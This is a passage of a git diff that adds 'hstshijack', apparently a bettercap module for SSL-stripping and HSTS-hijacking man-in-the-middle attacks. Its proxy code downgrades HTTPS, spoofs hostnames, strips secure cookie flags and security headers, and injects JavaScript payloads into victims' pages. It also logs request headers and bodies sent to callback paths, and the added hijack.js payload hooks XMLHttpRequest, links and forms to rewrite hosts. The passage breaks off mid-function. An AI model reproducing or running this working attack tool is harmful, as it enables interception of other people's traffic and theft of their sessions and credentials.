payload_container_prefix = payload_container_prefix.replace(/\{\{SESSION_ID_TAG\}\}/g, session_id); + payload_container_prefix = payload_container_prefix + + "var " + varname_target_hosts + " = [\"" + target_hosts.join("\",\"") + "\"];\n" + + "var " + varname_replacement_hosts + " = [\"" + replacement_hosts.join("\",\"") + "\"];\n"; + payload_container_suffix = payload_container_suffix.replace(/\{\{SESSION_ID_TAG\}\}/g, session_id); + + /* Prepare SSL index */ + ssl_index_check = env["hstshijack.ssl.check"].toLowerCase() || "true"; + all_domains = readFile(env["hstshijack.ssl.domains"]).split("\n"); + if (all_domains.length === 0) { + log_info(on_blue + "hstshijack" + reset + " No indexed domains were found, index will be reset."); + } else { + if (ssl_index_check !== "false") { + log_info(on_blue + "hstshijack" + reset + " Indexing SSL domains ..."); + all_domains + .sort() + .filter(function(domain, index, arr){ + if (domain !== "" && arr.indexOf(domain) === index) { + indexDomain(domain); + } + }); + } else { + ssl.domains = all_domains; + index_file_contents = readFile(env["hstshijack.ssl.index"]); + if (ssl.domains.length !== 0 && index_file_contents === "") { + log_fatal(on_blue + "hstshijack" + reset + " List of domains using SSL is not indexed. Please set your hstshijack.ssl.check value to true in your caplet."); + } + ssl.index = JSON.parse(index_file_contents); + log_info(on_blue + "hstshijack" + reset + " Skipped SSL index check for " + all_domains.length + " domain(s)."); + } + } + + /* Ensure targeted hosts are in SSL log (no wildcards). */ + for (var a = 0; a < target_hosts.length; a++) { + if (target_hosts[a].indexOf("*") === -1) { + indexDomain(target_hosts[a]); + } + } + + saveSSLIndex(); + log_info(on_blue + "hstshijack" + reset + " Indexed " + ssl.domains.length + " domains."); +} + +function showConfig() { + /* Print module configuration. */ + logStr = "\n"; + logStr += " " + bold + "Caplet" + reset + "\n"; + logStr += "\n"; + logStr += " " + yellow + " hstshijack.ssl.domains" + reset + " > " + (env["hstshijack.ssl.domains"] ? green + env["hstshijack.ssl.domains"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ssl.index" + reset + " > " + (env["hstshijack.ssl.index"] ? green + env["hstshijack.ssl.index"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ssl.check" + reset + " > " + (env["hstshijack.ssl.check"].match(/^true$/i) ? green + "true" : red + "false") + reset + "\n"; + logStr += " " + yellow + " hstshijack.ignore" + reset + " > " + (env["hstshijack.ignore"] ? green + env["hstshijack.ignore"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.targets" + reset + " > " + (env["hstshijack.targets"] ? green + env["hstshijack.targets"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + "hstshijack.replacements" + reset + " > " + (env["hstshijack.replacements"] ? green + env["hstshijack.replacements"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + "hstshijack.blockscripts" + reset + " > " + (env["hstshijack.blockscripts"] ? green + env["hstshijack.blockscripts"] : red + "undefined") + reset + "\n"; + logStr += " " + yellow + " hstshijack.obfuscate" + reset + " > " + (obfuscate ? green + "true" : red + "false") + reset + "\n"; + logStr += " " + yellow + " hstshijack.payloads" + reset + " > "; + if (env["hstshijack.payloads"]) { + list = env["hstshijack.payloads"].replace(/\s/g, "").split(","); + logStr += green + list[0] + reset + "\n"; + if (list.length > 1) { + for (a = 1; a < list.length; a++) { + logStr += " > " + green + list[a] + reset + "\n"; + } + } + } else { + logStr += red + "undefined" + reset + "\n"; + } + logStr += "\n"; + logStr += " " + bold + "Commands" + reset + "\n"; + logStr += "\n"; + logStr += " " + bold + " hstshijack.show" + reset + " : Show module info.\n"; + logStr += " " + bold + "hstshijack.ssl.domains" + reset + " : Show recorded domains with SSL.\n"; + logStr += " " + bold + " hstshijack.ssl.index" + reset + " : Show SSL domain index.\n"; + logStr += "\n"; + logStr += " " + bold + "Session info" + reset + "\n"; + logStr += "\n"; + logStr += " " + bold + " Session ID" + reset + " : " + session_id + "\n"; + logStr += " " + bold + " Callback path" + reset + " : " + callback_path + "\n"; + logStr += " " + bold + "Whitelist path" + reset + " : " + whitelist_path + "\n"; + logStr += " " + bold + "SSL index path" + reset + " : " + ssl_index_path + "\n"; + logStr += " " + bold + " SSL domains" + reset + " : " + ssl.domains.length + " domain" + (ssl.domains.length === 1 ? "" : "s") + "\n"; + console.log(logStr); +} + +function onCommand(cmd) { + if (cmd === "hstshijack.show") { + showConfig(); + return true; + } + if (cmd === "hstshijack.ssl.domains") { + if (ssl.domains.length > 20) { + truncated_domains = ssl.domains.slice(0, 20); + truncated_domains.push("..."); + log_string = truncated_domains.join(reset + "\n " + yellow); + console.log("\n" + bold + " Recorded domains with SSL (" + ssl.domains.length + ")" + reset + "\n\n " + yellow + log_string + reset + "\n"); + } else { + console.log("\n" + bold + " Recorded domains with SSL (" + ssl.domains.length + ")" + reset + "\n\n " + yellow + ssl.domains.join(reset + "\n " + yellow) + reset + "\n"); + } + return true; + } + if (cmd === "hstshijack.ssl.index") { + log_string = "\n" + bold + " SSL domain index (" + Object.keys(ssl.index).length + ")" + reset + "\n"; + for (a = 0; a < Object.keys(ssl.index).length; a++) { + indexed_char = Object.keys(ssl.index)[a]; + char_index = ssl.index[indexed_char]; + log_string += "\n " + yellow + indexed_char + reset + " (first: " + char_index[0] + ", last: " + char_index[1] + ")"; + } + console.log(log_string + "\n"); + return true; + } + if (cmd === "hstshijack.whitelist") { + console.log("\n" + JSON.stringify(whitelist, null, 2) + "\n"); + return true; + } +} + +function onLoad() { + math_seed = new Date().getMilliseconds(); + Math.random = function() { + return randomFloat(); + } + + log_info(on_blue + "hstshijack" + reset + " Generating random variable names for this session ..."); + session_id = randomString(8 + Math.random() * 8); + varname_target_hosts = randomString(8 + Math.random() * 8); + varname_replacement_hosts = randomString(8 + Math.random() * 8); + callback_path = "/" + randomString(8 + Math.random() * 8); + whitelist_path = "/" + randomString(8 + Math.random() * 8); + ssl_index_path = "/" + randomString(8 + Math.random() * 8); + + log_info(on_blue + "hstshijack" + reset + " Reading caplet ..."); + configure(); + log_info(on_blue + "hstshijack" + reset + " Module loaded."); + showConfig(); +} + +function onRequest(req, res) { + if (req.Path === ssl_index_path) { + /* + SSL callback. + + Requests made for this path should include a hostname in the query so + this module can send a HEAD request to learn HTTPS redirects. + */ + log_debug(on_blue + "hstshijack" + reset + " SSL callback received from " + green + req.Client.IP + reset + " for " + bold + req.Query + reset + "."); + queried_host = req.Query; + if (getDomainIndex(queried_host, getIndexRange(queried_host.charAt(0))) === -1) { + log_debug(on_blue + "hstshijack" + reset + " Learning unencrypted HTTP response from " + queried_host + " ..."); + req.Hostname = queried_host; + req.Path = "/"; + req.Query = ""; + req.Body = ""; + req.Method = "HEAD"; + } + } else if (req.Path === callback_path) { + /* + Basic callback. + + Requests made for this path will be dropped. + Requests made for this path will be printed. + */ + req.Scheme = "ignore"; + logStr = on_blue + "hstshijack" + reset + " Callback received from " + green + req.Client.IP + reset + " for " + bold + req.Hostname + reset + "\n"; + logStr += " " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " [" + green + "hstshijack.callback" + reset + "] " + on_grey + "CALLBACK" + reset + " " + "http://" + req.Hostname + req.Path + (req.Query !== "" ? ("?" + req.Query) : "") + "\n " + on_grey + " " + reset + " \n"; + logStr += " " + on_grey + " " + reset + " " + bold + "Headers" + reset + "\n " + on_grey + " " + reset + " \n"; + headers = req.Headers.split("\r\n"); + for (i = 0; i < headers.length; i++) { + if (headers[i].split(": ").length === 2) { + params = headers[i].split(": "); + logStr += " " + on_grey + " " + reset + " " + blue + params[0] + reset + ": " + yellow + params[1] + reset + "\n"; + } else { + logStr += " " + on_grey + " " + reset + " " + yellow + headers[i] + reset + "\n"; + } + } + logStr += " " + on_grey + " " + reset + " " + bold + "Query" + reset + "\n " + on_grey + " " + reset + " \n"; + queries = req.Query.split("&"); + for (i = 0; i < queries.length; i++) { + if (queries[i].split("=").length === 2) { + params = queries[i].split("="); + logStr += " " + on_grey + " " + reset + " " + green + decodeURIComponent(params[0]) + reset + " : " + decodeURIComponent(params[1]) + reset + "\n"; + } else { + logStr += " " + on_grey + " " + reset + " " + green + queries[i] + reset + "\n"; + } + } + logStr += " " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " " + bold + "Body" + reset + "\n " + on_grey + " " + reset + " \n " + on_grey + " " + reset + " " + yellow + req.ReadBody() + reset + "\n"; + log_info(logStr); + } else if (req.Path === whitelist_path) { + /* + Whitelisting callback. + + Requests made for this path will be dropped. + Requests made for this path will be printed. + Requests made for this path will stop all attacks towards this client with the requested hostname. + */ + req.Scheme = "ignore"; + logStr = on_blue + "hstshijack" + reset + " Whitelisting callback received from " + green + req.Client.IP + reset + " for " + bold + req.Hostname + reset + "\n"; + logStr += " " + on_white + " " + reset + " \n " + on_white + " " + reset + " [" + green + "hstshijack.callback" + reset + "] " + on_white + "WHITELIST" + reset + " " + "http://" + req.Hostname + req.Path + (req.Query !== "" ? ("?" + req.Query) : "") + "\n " + on_white + " " + reset + " \n"; + logStr += " " + on_white + " " + reset + " " + bold + "Headers" + reset + "\n " + on_white + " " + reset + " \n"; + headers = req.Headers.split("\n"); + for (i = 0; i < headers.length; i++) { + if (headers[i].split(": ").length === 2) { + params = headers[i].split(": "); + logStr += " " + on_white + " " + reset + " " + blue + params[0] + reset + ": " + yellow + params[1] + reset + "\n"; + } else { + logStr += " " + on_white + " " + reset + " " + yellow + headers[i] + reset + "\n"; + } + } + logStr += " " + on_white + " " + reset + " " + bold + "Query" + reset + "\n " + on_white + " " + reset + " \n"; + queries = req.Query.split("&"); + for (i = 0; i < queries.length; i++) { + if (queries[i].split("=").length === 2) { + params = queries[i].split("="); + logStr += " " + on_white + " " + reset + " " + green + decodeURIComponent(params[0]) + reset + " : " + decodeURIComponent(params[1]) + reset + "\n"; + } else { + logStr += " " + on_white + " " + reset + " " + green + queries[i] + reset + "\n"; + } + } + logStr += " " + on_white + " " + reset + " \n " + on_white + " " + reset + " " + bold + "Body" + reset + "\n " + on_white + " " + reset + " \n " + on_white + " " + reset + " " + yellow + req.ReadBody() + reset + "\n"; + log_info(logStr); + + /* Add requested hostname to whitelist. */ + if (whitelist[req.Client.IP]) { + if (whitelist[req.Client.IP].indexOf(req.Hostname) === -1) { + whitelist[req.Client.IP].push(req.Hostname); + } + } else { + whitelist[req.Client.IP] = [req.Hostname]; + } + /* Also whitelist unspoofed version of requested hostname. */ + for (a = 0; a < target_hosts.length; a++) { + whole_regexp_set = toWholeRegexpSet(replacement_hosts[a], target_hosts[a]); + if (req.Hostname.match(whole_regexp_set[0])) { + whitelist[req.Client.IP].push(req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1])); + break; + } + } + } else { + /* + Not a callback. + + Redirect client to the real host if a whitelist callback was received previously. + Restore spoofed hostnames and schemes in request. + */ + if (whitelist[req.Client.IP]) { + for (a = 0; a < whitelist[req.Client.IP].length; a++) { + whole_regexp_set = toWholeRegexpSet(whitelist[req.Client.IP][a], ""); + if (req.Hostname.match(whole_regexp_set[0])) { + /* Restore requested hostname if it was spoofed. */ + var unspoofed_host; + for (b = 0; b < replacement_hosts.length; b++) { + whole_regexp_set = toWholeRegexpSet(replacement_hosts[b], target_hosts[b]); + if (req.Hostname.match(whole_regexp_set[0])) { + unspoofed_host = req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1]); + query = (req.Query !== "" ? ("?" + req.Query) : ""); + res.SetHeader("Location", "https://" + unspoofed_host + req.Path + query); + res.Status = 301; + log_info(on_blue + "hstshijack" + reset + " Redirecting " + green + req.Client.IP + reset + " from " + bold + req.Hostname + reset + " to " + bold + unspoofed_host + reset + " because we received a whitelisting callback."); + return; + } + } + } + } + } + + /* Restore original hostnames. */ + for (a = 0; a < target_hosts.length; a++) { + /* Restore original hostnames in headers. */ + regexp_set = toRegexpSet(replacement_hosts[a], target_hosts[a]); + if (req.Headers.match(regexp_set[0])) { + req.Headers = req.Headers.replace(regexp_set[0], regexp_set[1]); + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + replacement_hosts[a] + reset + " in request header(s)."); + } + + if (req.Query !== "") { + /* Restore original hostnames in query URI. */ + if (req.Query.match(regexp_set[0])) { + req.Query = req.Query.replace(regexp_set[0], regexp_set[1]); + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + replacement_hosts[a] + reset + " in query URI."); + } + + /* Restore original hostnames in encoded query URI parameters. */ + query_params = req.Query.split("&"); + new_params = []; + for (b = 0; b < query_params.length; b++) { + param = query_params[b]; + param_parts = param.match(selector_query_param); + if (param_parts) { + param_name = param_parts[1]; + param_value = param_parts[2]; + if (param_value.indexOf("%") !== -1) { + param_value_decoded = decodeURIComponent(param_value); + if (param_value !== param_value_decoded) { + if (param_value_decoded.match(regexp_set[0])) { + param_value_decoded_spoofed = param_value_decoded.replace( + regexp_set[0], + regexp_set[1]); + new_params.push( + param_name + "=" + encodeURIComponent(param_value_decoded_spoofed)); + } else { + new_params.push(param); + } + } else { + new_params.push(param); + } + } else { + if (param_value.match(regexp_set[0])) { + param_value_spoofed = param_value.replace(regexp_set[0], regexp_set[1]); + new_params.push(param_name + "=" + param_value_spoofed); + } else { + new_params.push(param); + } + } + } else { + new_params.push(param); + } + } + new_query_string = new_params.join("&"); + if (new_query_string !== req.Query) { + req.Query = new_query_string; + } + } + + /* Restore original hostname of request. */ + whole_regexp_set = toWholeRegexpSet(replacement_hosts[a], target_hosts[a]) + if (req.Hostname.match(whole_regexp_set[0])) { + spoofed_host = req.Hostname; + req.Hostname = req.Hostname.replace(whole_regexp_set[0], whole_regexp_set[1]); + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored original hostname " + bold + spoofed_host + reset + " to " + req.Hostname + " and restored HTTPS scheme."); + } + } + + /* Restore HTTPS scheme. */ + if (getDomainIndex(req.Hostname, getIndexRange(req.Hostname.charAt(0))) !== -1) { + /* Restore HTTPS scheme of request if domain is indexed. */ + if (req.Scheme !== "https") { + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + bold + req.Hostname + reset + "."); + } + /* Restore HTTPS scheme in request headers if domains are indexed. */ + escaped_domain = req.Hostname.replace(selector_all_dots, "\\.").replace(selector_all_dashes, "\\-"); + regexp = new RegExp("http://" + escaped_domain + "([^a-z0-9\\-\\.]|$)", "ig"); + if (req.Headers.match(regexp)) { + req.Headers = req.Headers.replace(regexp, "https://" + req.Hostname + "$1"); + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + req.Hostname + " in request headers."); + } + } else { /* If requested domain is not indexed. */ + log_debug(on_blue + "hstshijack" + reset + " Domain " + bold + req.Hostname + reset + " is not indexed."); + if (req.Scheme !== "https") { + for (b = 0; b < target_hosts; b++) { + /* Restore HTTPS scheme of request if domain is targeted. */ + whole_regexp_set = toWholeRegexpSet(target_hosts[b], ""); + if (req.Hostname.match(whole_regexp_set[0])) { + req.Scheme = "https"; + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of targeted domain " + bold + req.Hostname + reset + "."); + break; + } + /* Restore HTTPS scheme in request headers if domains are targeted. */ + regexp_set = toRegexpSet(target_hosts[b], ""); + matches = req.Headers.match(regexp_set[0]); + for (c = 0; c < matches.length; c++) { + escaped_domain = matches[c].replace(selector_all_dots, "\\.").replace(selector_all_dashes, "\\-"); + regexp = new RegExp("http://" + escaped_domain + "([^a-z0-9\\-\\.]|$)", "ig"); + req.Headers = req.Headers.replace(regexp, "https://" + matches[c] + "$1"); + log_debug(on_blue + "hstshijack" + reset + " Restored HTTPS scheme of indexed domain " + req.Hostname + " in request headers."); + } + } + } + } + } +} + +function onResponse(req, res) { + res.ReadBody(); + + /* Remember HTTPS redirects. */ + location = res.GetHeader("Location", ""); + if (location.match(selector_uri_one)) { + host = location.replace(selector_uri_two, "$1"); + if (host !== "") { + indexDomain(host); + } + } + + /* Ignore this response if whitelisted. */ + if (whitelist[req.Client.IP]) { + if (whitelist[req.Client.IP].indexOf(req.Hostname) !== -1) { + log_debug(on_blue + "hstshijack" + reset + " Ignoring response from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset + "."); + return; + } + } else { + for (a = 0; a < ignore_hosts.length; a++) { + var whole_regexp_set; + if (ignore_hosts[a] !== "*") { + whole_regexp_set = toWholeRegexpSet(ignore_hosts[a], ""); + } + + if ( + ignore_hosts[a] === "*" + || req.Hostname.match(whole_regexp_set[0]) + ) { + log_debug(on_blue + "hstshijack" + reset + " Ignored response from " + bold + req.Hostname + reset + "."); + return; + } + } + + /* Spoof markup bodies. */ + if ( + res.ContentType.match(selector_content_type_html) + || req.Path.match(selector_extension_html) + ) { + /* Prevent meta tag induced CSP restrictions. */ + res.Body = res.Body.replace( + selector_meta_tag_csp, + "$1"); + + /* Block scripts. */ + for (a = 0; a < block_script_hosts.length; a++) { + if ( + block_script_hosts[a] === "*" + || req.Hostname.match(toWholeRegexpSet(block_script_hosts[a], "")[0]) + ) { + res.Body = res.Body.replace(selector_html_script_open_tag, "
\n" + + payload_container_prefix + injection + payload_container_suffix + + "\n" + + res.Body; + } + log_debug(on_blue + "hstshijack" + reset + " Injected document from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset); + } + } + + /* Spoof JavaScript bodies. */ + if (res.ContentType.match(selector_content_type_js)) { + /* Block scripts. */ + for (a = 0; a < block_script_hosts.length; a++) { + if ( + block_script_hosts[a] === "*" + || req.Hostname.match(toWholeRegexpSet(block_script_hosts[a], "")[0]) + ) { + res.Body = ""; + log_debug(on_blue + "hstshijack" + reset + " Cleared JavaScript resource from " + bold + req.Hostname + reset + "."); + break; + } + } + + /* Inject payloads. */ + injection = ""; + for (a = 0; a < Object.keys(payloads).length; a++) { + injecting_host = Object.keys(payloads)[a]; + if ( + injecting_host === "*" + || req.Hostname.match(toWholeRegexpSet(injecting_host, "")[0]) + ) { + injection = injection + payloads[injecting_host]; + } + } + if (injection !== "") { + res.Body = payload_container_prefix + injection + payload_container_suffix + res.Body; + log_debug(on_blue + "hstshijack" + reset + " Injected JavaScript file from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset); + } + } + + /* Strip SSL from location headers. */ + res.Headers = res.Headers + .replace(selector_scheme_http_https_colon, "$1:") + .replace(selector_port_https, "$1"); + + /* Spoof hosts in headers. */ + for (a = 0; a < target_hosts.length; a++) { + regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]); + res.Headers = res.Headers.replace(regexp_set[0], regexp_set[1]); + } + + /* Remove secure cookie settings. */ + new_headers = ""; + res.Headers.split("\r\n").forEach(function(headerString){ + if (headerString !== "") { + matches = headerString.match(selector_header); + if (matches.length >= 3) { + header_name = matches[1]; + header_value = matches[2]; + if (header_name.match(selector_header_set_cookie)) { + new_header_value = ""; + cookie_params = header_value.split(";"); + cookie_params.forEach(function(cookie_param){ + if (cookie_param !== "") { + stripped_cookie_param = cookie_param.match(selector_strip_whitespace)[1]; + if (!stripped_cookie_param.match(selector_header_set_cookie_secure_samesite)) { + if (new_header_value === "") { + new_header_value = stripped_cookie_param; + } else { + new_header_value += "; " + stripped_cookie_param; + } + } + } + }); + new_headers += header_name + ": " + new_header_value + "\r\n"; + } else { + new_headers += header_name + ": " + header_value + "\r\n"; + } + } + } + }); + + /* Remove security headers. */ + res.Headers = res.Headers.replace(selector_header_csp, ""); + res.RemoveHeader("Strict-Transport-Security"); + res.RemoveHeader("Content-Security-Policy-Report-Only"); + res.RemoveHeader("Public-Key-Pins"); + res.RemoveHeader("Public-Key-Pins-Report-Only"); + res.RemoveHeader("X-Frame-Options"); + res.RemoveHeader("X-Content-Type-Options"); + res.RemoveHeader("X-Download-Options"); + res.RemoveHeader("X-Permitted-Cross-Domain-Policies"); + res.RemoveHeader("X-XSS-Protection"); + res.RemoveHeader("Expect-Ct"); + + /* Set insecure headers. */ + allowed_origin = res.GetHeader("Access-Control-Allow-Origin", "*"); + if (allowed_origin !== "*") { + for (a = 0; a < target_hosts.length; a++) { + regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]); + if (allowed_origin.match(regexp_set[0])) { + allowed_origin = allowed_origin.replace(regexp_set[0], regexp_set[1]); + break; + } + } + } + res.SetHeader("Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("X-WebKit-CSP", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("X-Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x"); + res.SetHeader("Access-Control-Allow-Credentials", "true"); + res.SetHeader("Access-Control-Allow-Origin", allowed_origin); + res.SetHeader("Access-Control-Allow-Methods", "*"); + res.SetHeader("Access-Control-Allow-Headers", "*"); + res.SetHeader("Cache-Control", "no-cache, no-store, must-revalidate"); + res.SetHeader("Expires", "Fri, 20 Apr 2018 04:20:00 GMT"); + res.SetHeader("Pragma", "no-cache"); + } +} + diff --git a/hstshijack/index.json b/hstshijack/index.json new file mode 100644 index 0000000..e69de29 diff --git a/hstshijack/payloads/google-search.js b/hstshijack/payloads/google-search.js new file mode 100644 index 0000000..d50be33 --- /dev/null +++ b/hstshijack/payloads/google-search.js @@ -0,0 +1,23 @@ +globalThis.addEventListener("DOMContentLoaded", function(){ + "use strict"; + + if (location.pathname === "/search") { + document.querySelectorAll("a").forEach(function(obf_var_link){ + if (obf_var_link.href && obf_var_link.href !== "") { + var obf_var_container = document.createElement("obf_dummy"); + obf_var_container.append(obf_var_link.cloneNode(true)) + obf_var_container.addEventListener("click", function(e){ + e.preventDefault(); + location.href = obf_var_link.href; + }); + obf_var_link.before(obf_var_container); + obf_var_link.remove(); + } + }); + } + + var obf_var_stylesheet = document.createElement("style"); + obf_var_stylesheet.innerText = `.gb_Pa{box-shadow:none}`; + document.body.append(obf_var_stylesheet); +}); + diff --git a/hstshijack/payloads/hijack.js b/hstshijack/payloads/hijack.js new file mode 100644 index 0000000..265eed8 --- /dev/null +++ b/hstshijack/payloads/hijack.js @@ -0,0 +1,234 @@ +/* + Hooks XMLHttpRequest as well as 'a', 'form', 'script' and 'iframe' nodes. + This payload is essential for hostname replacements. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + +(function(){ + "use strict"; + + var obf_var_regex_one = /\-/g, + obf_var_regex_two = /^\*./, + obf_var_regex_three = /^\*\./, + obf_var_regex_four = /\./g, + obf_var_regex_five = /^\*\./, + obf_var_regex_six = /\.\*$/, + obf_var_regex_seven = /\.\*/g; + + globalThis.addEventListener("DOMContentLoaded", function(){ + "use strict"; + + var obf_func_open = XMLHttpRequest.prototype.open, + obf_var_XMLHttpRequest = new XMLHttpRequest(), + obf_var_callback_log = []; + + function obf_func_toWholeRegexpSet(obf_var_selector_string, obf_var_replacement_string) { + if (obf_var_selector_string.indexOf("*") != -1) { + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_one, "\\-"); + if (obf_var_selector_string.match(obf_var_regex_two)) { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_three, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"), + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_five, ""); + return [ + new RegExp("^" + obf_var_selector_string + "$", "ig"), + "$1" + obf_var_replacement_string + ]; + } else if (obf_var_selector_string.match(obf_var_regex_six)) { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_seven, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"), + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_six, ""); + return [ + new RegExp(obf_var_selector_string, "ig"), + obf_var_replacement_string + "$1" + ]; + } + } else { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-"); + return [ + new RegExp("^" + obf_var_selector_string + "$", "ig"), + obf_var_replacement_string + ]; + } + } + + function obf_func_parseURL(obf_var_url) { + var obf_var_strippedURL = obf_var_url.replace(/^\s*(.*)\s*$/g, "$1"), + obf_var_retval = ["","","","","",""]; + if (obf_var_strippedURL.match(/^((?:\w+:)?\/\/).*$/i)) { + obf_var_retval[0] = obf_var_strippedURL.replace(/^((?:\w+:)?\/\/).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i)) { + obf_var_retval[1] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*/i)) { + obf_var_retval[2] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:\w+:)?\/\/(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)?([/][^?#]*).*/i)) { + obf_var_retval[3] = obf_var_strippedURL.replace(/^(?:(?:\w+:)?\/\/)?[^/?#]*([/][^?#]*).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^.*?([?][^#]*).*/i)) { + obf_var_retval[4] = obf_var_strippedURL.replace(/^.*?([?][^#]*).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^[^#]*([#].*)/i)) { + obf_var_retval[5] = obf_var_strippedURL.replace(/^[^#]*([#].*)/i, "$1"); + } + return obf_var_retval; + } + + function obf_func_callback(obf_var_host) { + for ( + var obf_var_i = 0; + obf_var_i < obf_var_callback_log.length; + obf_var_i++ + ) { + if (obf_var_callback_log[i] == obf_var_host) { + return; + } + } + obf_var_callback_log.push(obf_var_host); + var obf_var_req = obf_var_XMLHttpRequest; + obf_var_req.open( + "GET", + "http://obf_random_host/obf_path_ssl_log?" + obf_var_host, + true); + obf_var_req.send(); + } + + function obf_func_hijack(obf_var_host) { + for ( + var obf_var_i = 0; + obf_var_i < obf_var_target_hosts.length; + obf_var_i++ + ) { + var obf_var_whole_regexp_set = obf_func_toWholeRegexpSet( + obf_var_target_hosts[obf_var_i], + obf_var_replacement_hosts[obf_var_i]); + if (obf_var_host.match(obf_var_whole_regexp_set[0])) { + obf_var_host = obf_var_host.replace( + obf_var_whole_regexp_set[0], + obf_var_whole_regexp_set[1]); + break; + } + } + return obf_var_host; + } + + function obf_func_hook_XMLHttpRequest() { + XMLHttpRequest.prototype.open = function( + obf_var_method, + obf_var_url, + obf_var_async, + obf_var_username, + obf_var_password + ) { + var obf_var_parsed_url = obf_func_parseURL(obf_var_url), + obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]); + if (obf_var_hijacked_host != obf_var_parsed_url[1]) { + if (obf_var_parsed_url[0].toLowerCase() === "https://") { + obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://"); + } + if (obf_var_parsed_url[2] === ":443") { + obf_var_parsed_url[2] = ""; + } + } + obf_var_url = obf_var_parsed_url[0] + + obf_var_hijacked_host + + obf_var_parsed_url[2] + + obf_var_parsed_url[3] + + obf_var_parsed_url[4] + + obf_var_parsed_url[5]; + return obf_func_open.apply(this, arguments); + } + } + + function obf_func_hook_nodes() { + document.querySelectorAll("a,form,script,iframe").forEach(function(obf_var_node){ + try { + var obf_var_url = ""; + switch (obf_var_node.tagName) { + case "A": + obf_var_node.href + ? obf_var_url = obf_var_node.href + : ""; + break; + case "FORM": + obf_var_node.action + ? obf_var_url = obf_var_node.action + : ""; + break; + case 